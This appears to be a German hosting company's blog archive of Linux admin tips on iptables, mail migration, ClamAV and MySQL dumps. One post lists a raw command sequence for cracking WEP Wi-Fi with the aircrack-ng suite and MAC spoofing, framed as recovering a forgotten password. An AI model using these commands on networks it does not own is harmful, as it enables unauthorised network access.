Hierfür genügt ein einfacher Befehl auf der Kommandozeile:
pdftoppm -f 1 -l 1 name.pdf | pnmtojpeg - > name.jpg
It pdftoppm oder pnmtojpeg nicht vorhanden, einfach mit apt-get <Paket> installieren.
Wie immer viel Erfolg!
Durchsuche Beiträge mit Schlagwörtern Linux
Heute stelle ich zumindest unter dem von mir unter Kubuntu Linux verwendeten Firefox 3.0.11 fest, dass ich gelegentlich nach der Eingabe und Übermittlung von Formulardaten/Loginfeldern weitergeleitet werde auf neborin.info oder xtraroom.info. Diese Seiten wiederum übermitteln eine Vielzahl von Trojanern und Viren, die eigentlich nur auf Windows-Rechnern zum Problem werden sollten. Zunächst dachte ich, einer unserer Server sei infiziert, da ein Kunde feststellte, dass er ebenfalls bei der Eingabe seiner Daten für den PS-Webhosting Kundenbereich auf o.g. Seite weiter geleitet wurde. Dies kann aber definitiv ausgeschlossen werden.
Google gibt bei der Suche nach neborin.info (noch) nicht sonderlich viel her, lediglich eine Warnung bei Norton Safe Web.
Zur Zeit lasse ich clamav mal über mein System laufen, vielleicht gibt das ja Aufschluss. Hier nochmal die Befehle zur Installation und Ausführung unter Linux (auf der Konsole als root bzw. mit sudo davor ausführen):
apt-get install clamav
clamfresh
clamscan -r /
Sofern es ein brauchbares Ergebnis gibt, stelle ich dies hier ein.
UPDATE:
clamscan hat nichts brauchbares ergeben. In der Zwischenzeit erhielt ich aber von Howie die Mitteilung, dass er heute ebenfalls auf neborin.info umgeleitet wurde. Da es sich vermutlich um eine Sicherheitslücke in Firefox handelt, sei dringend ein Upgrade auf die Version 3.0.12 empfohlen, die seit heute erhältlich ist. Sie behebt einige kritische Lücken, die durchaus in Verbindung mit den o.g. Symptomatiken stehen könnten, siehe Artikel bei heise online. Die 3.0.11 kam mir ohnehin etwas langsam und unperformant vor.
Unter (k)ubuntu Linux sollte also baldmöglichst ein
apt-get update
und anschließend
apt-get upgrade
durchgeführt werden. Selbstverständlich sollten auch alle Windows-Nutzer dieses Update auf Firefox 3.0.12 vornehmen, sofern Sie Version 3.0.11 oder älter verwenden.
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.12) Gecko/2009070811 Ubuntu/9.04 (jaunty) Firefox/3.0.12
UPDATE 2 - 23.07.2009, 13:00 Uhr:
Ein Update auf Firefox 3.0.12 hilft zumindest dann nicht, wenn man sich den Trojaner bereits eingefangen hat.
Mittlerweile hat sich ein anderer Webhoster aus Österreich bei mir gemeldet, der ebenfalls von Kunden Mitteilungen bekommt, dass "Server gehackt seien". Aber das kann wohl, genau wie bei uns (PS-Webhosting), ausgeschlossen werden. Hier sind zudem auch Internet Explorer 8.0.6 Versionen betroffen. Eventuell befindet und verbreitet sich der Schadcode unter anderem über gehackte Foren, so eine Vermutung des Hosters aus Österreich und so in Teilen auch in diesem Forum geäußert. Ein Kunde von uns verwendet OS X auf einem MAC, auch mit Firefox 3.0.11 und berichtet ebenfalls über die Symptomatik.
Die Suchanfragen nach den o.g. URLs häufen sich derzeit recht stark. Ich bin inzwischen jedenfalls erstmal von Kubuntu 9.04 zurückgegangen auf das vorher verwendete 8.04, was sich auf einer anderen Partition befindet. Ganz schön "old-fashioned", dieses KDE 3.5. 
Und die 300 MB an Updates laufen gerade..
Neulich habe ich etwas mit iptables rumgespielt, weil mich interessiert hat, wie man den Zugriff auf einen Server auf eine IP beschränken kann:
iptables -A INPUT -i eth0 -p tcp --dport 80 -s 194.116.186.99 -j ACCEPT iptables -A INPUT -i eth0 -p tcp --dport 80 -j DROP
Dies gestattet den Zugriff auf den Apache-Webserver (Port 80) nur von der angegebenen IP aus (ACCEPT). Alle anderen IPs werden geDROPed.
..denn ab heute Abend ziehen wir über zehntausend Domains mit zehntausenden E-Mailadressen um auf die neuen Mailserver-Systeme. Es hat sich gezeigt, dass eine Hauruck-Aktion effektiver und trotz vieler zusätzlicher Stunden Arbeit schmerzloser ist, als ein Umzug nach und nach.
Das Ganze ist nicht ganz so einfach, immerhin handelt es sich um eine Migration vom bisherigen Qmail auf Postfix, im laufenden Betrieb. Das heißt, es muss für die Kunden sichergestellt sein, dass während der Umstellungen keine E-Mails verloren gehen. Zudem sollen die Kunden möglichst wenig Aufwand haben, d.h. idealerweise in Ihrem E-Mailprogramm nichts umstellen müssen.
Die größte Problematik dabei sind die vielen auf den bisherigen Mailservern gespeicherten E-Mails in Form von kleinen Dateien. Diese Millionen von Dateien, mehrere hundert Gigabyte an Daten, benötigen vermutlich sehr lange, bis sie auf die neuen Systeme kopiert sind. Daher kopieren wir zunächst nur die Konfiguration auf die neuen Mailserver, sodass Kunden weiterhin E-Mails senden und empfangen können. Haben sie E-Mails auf dem Server gespeichert, beispielsweise weil sie IMAP oder Webmail nutzen, sind diese Mails erst einmal weg und werden dann nach und nach wieder ins Postfach kopiert. Bis Montag ist hoffentlich alles abgeschlossen. Sollte aber klappen!
Spannend wirds! Und der gute alte turbohermes, unser bisheriger primärer Mailserver, steht kurz vor seiner wohlverdienten Rente. Wobei, vermutlich wird auch dieser recycled und einer neuen Verwendung, zum Beispiel als Webhosting-Server, zugeführt.
Der Webserver eines Kunden verabschiedete sich heute nach einem Reboot mit einem klassischen Windows-Bluescreen. Windows. Natürlich Windows. Und ohne Original Windows 2000 CD geht natürlich nichts.
Aber auf das Suchen nach einer Windows 2000 Version kann man als Linux-User auch getrost verzichten. Den Server einfach mit einer aktuellen Knoppix CD booten und das durcheinander geratene Dateisystem mit dem Programm ntfsfix reparieren. Nach einem erneuten Reboot checkt Windows das Filesystem ohne lästigen Bluescreen und fährt anschließend problemlos hoch.
Linux repariert Windows. Umgekehrt ist das wirklich kaum vorstellbar.. 
Hier wieder mal ein kurzer Linux Tipp, um auf einem Server mit iptables eine IP auf allem Ports zu sperren, die nervt und den Betrieb beeinträchtigt. Weg damit!
iptables -I INPUT -s 82.80.252.158 -j REJECT
Oder auch direkt auf dem Router, die IP ist dann für alle dahinterliegenden Server gesperrt:
iptables -A FORWARD -s 82.80.252.158 -j DROP
Damit die Sperre greift, ist es eventuell notwendig, den entsprechenden Dienst neu zu starten, auf den die IP zugreift. Ein laufender Download über den Browser wird also nicht sofort unterbrochen. Eine Neustart des (Apache) Webservers wäre notwendig (apachectl / apache2ctl restart).
Eine Liste der gesperrten IPs (Regeln) erhält man mit
iptables -L
Um eine Regel zu löschen, muss man die entsprechende Zeilennummer ermitteln (also in der jeweiligen Kategorie, hier INPUT) und dann löschen mit:
iptables -D INPUT Zeilennummer
Falls es sehr viele Zeilen sind, iptables -L in eine Datei pipen und diese zum Beispiel mit vim öffnen, wo dann die jeweilige Zeile angezeigt wird:
iptables -L > Datei
vim Datei
Mit iptables lassen sich nicht nur einzelne IPs sperren, sondern auch ganze Netze (zum Beispiel 82.80.252.0/24). Vorher eine whois-Abfrage auf die IP machen und die Größe des Netzes ermitteln.
Wie immer viel Erfolg!
Hier ein paar gesammelte Befehle zum knacken eines per WEP gesicherten WLans unter (Ubuntu/Debian) Linux. Nicht ganz vollständig und ohne Kommentare. Aber eventuell doch hilfreich, wenn man mal sein WLan Passwort vergessen hat..
modprobe -r iwl3945 modprobe ipwraw iwconfig wifi0 mode Monitor macchanger -m 00:11:22:33:44:55 wifi0 kismet airodump-ng --ivs -w out -c 1 wifi0 airodump-ng -c 11 --bssid 00:14:6C:7E:40:80 -w output wifi0 airodump-ng -c 11 --bssid 00:03:C9:8B:F0:4B -w output wifi0 aireplay-ng --arp -b 00:03:C9:8B:F0:4B -h 00:1F:F3:9A:F7:AC wifi0 aireplay-ng -1 0 -e WLanName -a 00:03:C9:8B:F0:4B -h 00:11:22:33:44:55 wifi0 aireplay-ng -1 6000 -o 1 -q 10 -e WLanName -a 00:03:C9:8B:F0:4B -h 00:11:22:33:44:55 wifi0 aireplay-ng --fake 10 -e WLanName -a 00:03:C9:8B:F0:4B -h 00:11:22:33:44:55 wifi0
WPA/WPA2 Befehle dann demnächst..
Unsere Server-Kunden werden regelmäßig durch uns daran erinnert, ihre eingesetzte Server-Software und ihr Betriebssystem aktuell zu halten, um Hackerangriffen vorzubeugen. Tja, und heute erwischt es uns mal selbst. Zugegebenermaßen ein Server, der bei uns im Büro steht und eher ein Schattendasein führt. Er beherbergt im Grunde lediglich den Webcam-Server, der die schönen Fotos bei uns aus dem Büro in alle Welt ausliefert. Die Kiste wurde leider etwas vernachlässigt und irgendwann erhält man dann eine E-Mail wie diese:
It appears that a user from your network has been trying to hack into our web server. We respectfully request that you investigate this incident as soon as possible and that this person immediately cease and desist from further brute force attacks on our server. See our servers Brute Force Detection log below.
Thank you for your cooperation in this matter.
Hostmaster
AZRiver.comThe remote system 123.123.123.123 was found to have exceeded acceptable login failures on dedicated.azriver.com; there was 152 events to the service sshd. As such the attacking host has been banned from further accessing this system. For the integrity of your host you should investigate this event as soon as possible.
Executed ban command:
/etc/apf/apf -d 123.123.123.123 {bfd.sshd}The following are event logs from 123.123.123.123 on service sshd (all time stamps are GMT -0700):
Mar 2 07:59:27 dedicated sshd[12037]: Received disconnect from ::ffff:123.123.123.123: 11: Bye Bye
Mar 2 07:59:28 dedicated sshd[12048]: Invalid user administrator from ::ffff:123.123.123.123
Mar 2 07:59:31 dedicated sshd[12048]: Failed password for invalid user administrator from ::ffff:123.123.123.123 port 52433 ssh2
Mar 2 07:59:32 dedicated sshd[12049]: Received disconnect from ::ffff:123.123.123.123: 11: Bye Bye
Mar 2 07:59:32 dedicated sshd[12051]: Failed password for root from ::ffff:123.123.123.123 port 51506 ssh[...]
Manchmal ist es notwendig, Dateien, die älter als X-Tage sind, zu identifizieren und ggf. zu löschen. Dies erreicht man mit folgendem Befehl:
find /pfad -mtime +30
sucht alle Dateien aus /pfad, die älter als 30 Tage sind.
Das Kommando lässt sich erweitern, wenn man beispielsweise alle Dateien löschen will, die älter als 30 Tage sind:
find /pfad -mtime +30 -exec rm {} \;
Ein kleiner Test zuvor schafft noch etwas Sicherheit, man weiß ja nie:
find /pfad -mtime +30 -exec ls -l {} \;
Wie immer, viel Erfolg!
Um eine .sql-Datei aus einer mySQL-Datenbank auf der Linux-Shell zu erstellen oder eine solche Datei zu importieren, verwendet man die folgenden Befehle:
Export:
mysqldump -uroot -p datenbankname > datei.sql
Import:
mysql -uroot -p datenbankname < datei.sql
Ich wünsche damit viel Erfolg!
